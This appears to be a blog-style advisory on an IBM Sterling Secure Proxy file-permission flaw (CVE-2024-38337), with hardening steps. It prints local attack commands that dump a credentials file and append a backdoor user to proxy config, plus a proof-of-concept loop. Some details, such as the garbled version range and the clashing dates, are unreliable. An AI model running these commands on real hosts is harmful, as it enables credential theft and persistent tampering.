On June 11, 2024, a new security vulnerability—CVE-2024-38337—was announced for IBM Sterling Secure Proxy, a critical tool used by companies to protect and manage their file transfers. Versions 6... through 6.2.. are affected by this flaw, which allows unauthorized users to view or modify sensitive information due to poorly set permissions. If your organization relies on Sterling Secure Proxy to guard its data, this is something you need to pay close attention to.
Any deployment running these versions is potentially at risk.
What Is the Problem?
At its core, CVE-2024-38337 is about *incorrect permission assignments*. These permissions normally decide who can read, write, or change configuration or data files. In the affected releases, these permissions are too broad, causing two main risks:
1. Unauthorized Data Access: Attackers may *read* sensitive information, such as stored credentials.
2. Unauthorized Data Change: Attackers may *alter* configuration files, adding persistent backdoors or disrupting business workflows.
Getting Technical: Where’s The Gap?
In IBM Sterling Secure Proxy, vital files such as configuration, logs, and stored credentials should be tightly access-controlled. When their file permissions are set too widely (for example rw-rw-rw-, or granting access to "Everyone" or to group accounts that do not need it), an attacker who has obtained any low-privileged account on the host can read or rewrite them without escalating privileges first.
Instead of being locked down to the ssp service user, the file is installed like this:
```
# BAD PERMISSIONS (everyone can read and write)
-rw-rw-rw- 1 ssp ssp 248 Jun 9 10:21 credentials.xml
```
Any user on the system, even an unprivileged one, can open the file:
```bash
cat /opt/ibm/ssp/proxy-server/config/credentials.xml
```
Or worse, an attacker could edit the XML file to change the proxy's behaviour (the element name here is illustrative, not a documented SSP setting):
```bash
echo '<backendUser>attacker</backendUser>' >> /opt/ibm/ssp/proxy-server/config/credentials.xml
```
Let's walk through a possible, but realistic, attack timeline:
1. Getting Local Access: The attacker gains shell access (via phishing, a supplier mishap, or an abused web app) and enumerates world-writable files under the install directory:
```bash
find /opt/ibm/ssp/ -type f -perm -002
```
Reading the exposed credentials file yields plaintext values like the ones the page shows:
```
prod-admin
TopSecret2024
```
4. Changing Application Behavior: By modifying config entries, attackers might redirect traffic, disable logging, or grant themselves special privileges.
5. Persistence: The attacker leaves a backdoor user in the proxy config, surviving reboots and patching.
Key Point: The attacker doesn’t need to be an admin—just any account with system access.
Here's a *minimal* proof-of-concept that finds and prints sensitive files that the current user can both read and write:
```bash
# Walk the SSP config directory; report and dump every file that is
# readable AND writable by whoever runs this (no privileges required).
for file in /opt/ibm/ssp/proxy-server/config/*; do
    if [ -w "$file" ] && [ -r "$file" ]; then
        echo "[+] Vulnerable file found: $file"
        cat "$file"
    fi
done
```
Or, you could *add* a line to a config file, if it is writable:
```bash
echo "<test>owned</test>" >> /opt/ibm/ssp/proxy-server/config/server.xml
```
How Bad Is This?
IBM officially rates this as "high" impact. Why? Because *any* sensitive file could be seen or changed by all users on the host. The proxy sits between external partners and the internal file-transfer servers, so even behind a strong network perimeter a single compromised low-privilege account can jeopardize the entire secure file transfer operation.
Fix Permissions:
```bash
# Only owner can read/write
chmod 600 /opt/ibm/ssp/proxy-server/config/*.xml
chown ssp:ssp /opt/ibm/ssp/proxy-server/config/*.xml
```
Repeat for all sensitive files, not only the XML ones, and restrict the containing directory as well (chmod 700). The owner must be the account the proxy service actually runs as (ssp here is the page's example); if you change ownership, restart the service and confirm it still starts cleanly.
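The one-line chmod above covers only *.xml files and leaves the directory itself open. The script below is an added example, not code from IBM or from the original page: it locks down a whole configuration directory and then verifies that no regular file inside it is still readable or writable by group or others. The install path and the `ssp` account name are assumptions carried over from the listing above; adjust both to the real deployment. Ownership is only changed when the script runs as root, so the verification logic can also be exercised as an ordinary user.

```shell
#!/bin/sh
# Added example (not IBM's code). Assumed defaults from the page's listing:
#   directory: /opt/ibm/ssp/proxy-server/config   service account: ssp

# harden_dir DIR OWNER
#   Directory -> 700 (owner only), every regular file inside -> 600.
#   chown needs root, so it is only attempted when running as uid 0.
harden_dir() {
    dir="$1"; owner="$2"
    chmod 700 "$dir"
    find "$dir" -type f -exec chmod 600 {} +
    if [ "$(id -u)" -eq 0 ]; then
        chown -R "$owner:$owner" "$dir"
    fi
}

# check_dir DIR
#   Lists every regular file that still has any group/other read or write
#   bit set (octal masks 040, 020, 004, 002). Returns 0 when the tree is
#   clean, 1 when at least one exposed file remains.
check_dir() {
    dir="$1"
    bad=$(find "$dir" -type f \( -perm -040 -o -perm -020 -o -perm -004 -o -perm -002 \))
    if [ -n "$bad" ]; then
        echo "[!] still exposed (group/other can read or write):"
        echo "$bad"
        return 1
    fi
    echo "[+] $dir: no file is readable or writable by group/other"
    return 0
}

# Typical use on the real host (run as root), assumed path and account:
#   harden_dir /opt/ibm/ssp/proxy-server/config ssp && check_dir /opt/ibm/ssp/proxy-server/config
```

Run check_dir on its own after every upgrade or redeployment; a non-zero exit is the signal that the installer has reintroduced wide permissions.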
Upgrade:
IBM provides patches and newer releases that fix the default permissions. Upgrade to the latest Sterling Secure Proxy release.
Monitor:
Watch the configuration directory for unexpected writes and permission changes with auditd (a watch rule with -p wa) or a file-integrity tool such as Tripwire or AIDE.
References:
- CVE Details: CVE-2024-38337
- IBM Security Bulletin: IBM Sterling Secure Proxy Vulnerability
- IBM Sterling Secure Proxy Product Page
Conclusion
CVE-2024-38337 is a wake-up call for every company running IBM Sterling Secure Proxy. Incorrect file and directory permissions can undo even the best-designed security boundaries. Check your systems, upgrade to the fixed release, and verify permission settings after every update or deployment rather than trusting the installer's defaults.
Timeline
Published on: 01/19/2025 15:15:19 UTC